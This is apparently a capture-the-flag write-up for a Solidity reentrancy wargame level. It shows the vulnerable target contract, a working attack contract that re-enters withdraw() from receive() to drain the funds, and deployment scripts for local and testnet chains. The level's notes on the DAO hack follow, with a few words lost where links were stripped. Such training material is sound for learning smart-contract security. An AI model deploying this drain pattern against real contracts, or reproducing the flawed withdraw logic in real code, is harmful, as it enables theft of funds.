The goal of this level is for you to steal all the funds from the contract.
Things that might help:
Untrusted contracts can execute code where you least expect it.
Fallback methods
Throw/revert bubbling
Sometimes the best way to attack a contract is with another contract.
See the page above, section "Beyond the console"
Level Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.12;
import 'openzeppelin-contracts-06/math/SafeMath.sol';
contract Reentrance {
using SafeMath for uint256;
mapping(address => uint) public balances;
function donate(address _to) public payable {
balances[_to] = balances[_to].add(msg.value);
}
function balanceOf(address _who) public view returns (uint balance) {
return balances[_who];
}
function withdraw(uint _amount) public {
if(balances[msg.sender] >= _amount) {
(bool result,) = msg.sender.call{value:_amount}("");
if(result) {
_amount;
}
balances[msg.sender] -= _amount;
}
}
receive() external payable {}
}
Exploit
The exploit is a standard reentrancy attack made possible because the funds are sent before the state variable is updated. The receiving contract can then call the withdraw function again, leading to more funds being withdrawn than should have been available.
Call the withdraw() function from the receive() function.
make anvil-exploit-level-10
<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>
make holesky-exploit-level-10
<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>
src/Level10.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Script, console} from "forge-std/Script.sol";
interface IReentrance {
function donate(address _to) external payable;
function withdraw(uint256 _amount) external;
}
/**
* Explainer from: https://solidity-by-example.org/fallback
* ETH is sent to contract
* is msg.data empty?
* / \
* yes no
* / \
* receive()? fallback()
* / \
* yes no
* / \
* receive() fallback()
*/
// ================================================================
// │ LEVEL 10 - REENTRANCY │
// ================================================================
contract Reentrancy {
IReentrance targetContract;
uint256 attackValue;
constructor(address _targetContractAddress) payable {
targetContract = IReentrance(_targetContractAddress);
attackValue = address(targetContract).balance;
if (attackValue == 0) revert("Target contract has no funds to exploit");
if (attackValue > address(this).balance) revert("Target contract has more funds than the exploit contract");
}
function attack() public {
// Attack contract
targetContract.donate{value: attackValue}(address(this));
targetContract.withdraw(attackValue);
(bool refundSuccess,) = address(msg.sender).call{value: address(this).balance}("");
if (!refundSuccess) revert("Refund call failed");
}
receive() external payable {
uint256 targetBalance = address(targetContract).balance;
if (targetBalance >= attackValue) {
targetContract.withdraw(attackValue);
}
}
}
script/Level10.s.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Script, console} from "forge-std/Script.sol";
import {HelperFunctions} from "script/HelperFunctions.s.sol";
import {Reentrancy} from "../src/Level10.sol";
// ================================================================
// │ LEVEL 10 - REENTRANCY │
// ================================================================
contract Exploit is Script, HelperFunctions {
function run() public {
address targetContractAddress = getInstanceAddress();
vm.startBroadcast();
Reentrancy reentrancy = new Reentrancy{value: 1 ether}(targetContractAddress);
reentrancy.attack();
vm.stopBroadcast();
}
}
Submit instance... 🥳
Completion Message
Always assume that the receiver of the funds you are sending can be another contract, not just a regular address. Hence, it can execute code in its payable fallback method and re-enter your contract, possibly messing up your state/logic.
Re-entrancy is a common attack. You should always be prepared for it!
The DAO Hack
Notes
No function, including the receive() function, can be invoked from logic in the constructor.
In order to prevent re-entrancy attacks when moving funds out of your contract, use the being aware that call will only return false without interrupting the execution flow. Solutions such as or can also be used.
transfer and send are no longer recommended solutions as they can potentially break contracts after the Istanbul hard fork .
The famous DAO hack used reentrancy to extract a huge amount of ether from the victim contract. See .